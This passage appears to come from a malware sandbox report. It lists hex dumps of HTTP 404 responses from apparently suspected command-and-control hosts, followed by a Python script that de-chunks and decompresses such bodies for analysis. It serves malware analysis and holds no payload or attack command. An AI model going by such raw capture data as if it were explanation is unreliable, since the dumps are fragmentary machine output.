            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:25 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 
30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:23:28 GMTServer: ApacheContent-Length: 13928Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 
34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:48 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:50 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:53 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Tue, 05 Nov 2024 14:23:55 GMTetag: W/"67231618-2b5"server: nginxvary: Accept-Encodingcontent-length: 693connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 
54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 05 Nov 2024 14:24:15 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 05 Nov 2024 14:24:17 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 05 Nov 2024 14:24:20 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 05 Nov 2024 14:24:23 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
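The gzip-compressed responses above are unreadable in the report's Data Ascii column, and the body is wrapped in HTTP chunked framing (the leading "36 61 0d 0a" is the chunk size 0x6a, the trailing "30 0d 0a 0d 0a" the zero-length terminating chunk). To check what a suspected C2 host actually answered, both layers have to be undone. The decoder below is an added example, not part of the report: the chunked-framing parser is this example's own minimal implementation, gzip handling comes from the standard library, and the two hex strings are copied from the Data Raw fields of the 14:24:15 (gzip) and 14:24:23 (plain) nginx responses above.

```python
"""Decode chunked (and optionally gzip-compressed) HTTP bodies from a sandbox 'Data Raw' hex dump.

Added example, not part of the Joe Sandbox report. The hex strings are copied from the
report's Data Raw fields; the chunked-framing parser is this example's own minimal
implementation of the transfer coding, not a library call.
"""
import gzip

# Data Raw of the 'Transfer-Encoding: chunked' + 'Content-Encoding: gzip' 404 from nginx.
GZIP_CHUNKED_HEX = (
    "36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 "
    "b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 "
    "00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c "
    "a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a "
    "30 0d 0a 0d 0a"
)
# Data Raw of the chunked but uncompressed 404 from nginx (chunk size 0x92 = 146 bytes).
PLAIN_CHUNKED_HEX = (
    "39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 "
    "20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c "
    "62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 "
    "6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e "
    "74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d "
    "0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a"
)


def dechunk(data: bytes) -> bytes:
    """Reassemble a chunked transfer-coding body. Raises ValueError on malformed framing
    (missing size line, short chunk, missing CRLF) instead of silently returning partial data."""
    out = bytearray()
    pos = 0
    while True:
        end = data.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size_field = data[pos:end].split(b";", 1)[0].strip()  # drop any chunk extension
        size = int(size_field, 16)
        pos = end + 2
        if size == 0:
            return bytes(out)  # zero-length chunk ends the body; trailers are ignored here
        chunk = data[pos:pos + size]
        if len(chunk) != size or data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def decode_body(hex_dump: str, content_encoding: str = None) -> bytes:
    """Turn a Data Raw hex dump of a chunked body into the bytes the client would have seen."""
    body = dechunk(bytes.fromhex(hex_dump))
    if content_encoding == "gzip":
        body = gzip.decompress(body)  # also verifies the member's CRC32 and length
    return body


if __name__ == "__main__":
    print(decode_body(GZIP_CHUNKED_HEX, "gzip").decode("utf-8"))
    print(decode_body(PLAIN_CHUNKED_HEX).decode("utf-8"))
```

gzip.decompress checks the trailer CRC32 and uncompressed length, so a transcription error anywhere in the hex shows up as an exception rather than as plausible but wrong HTML. The same two steps apply to the 454-byte gzip bodies earlier in the report; their Data Ascii columns are just the compressed bytes rendered as text.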
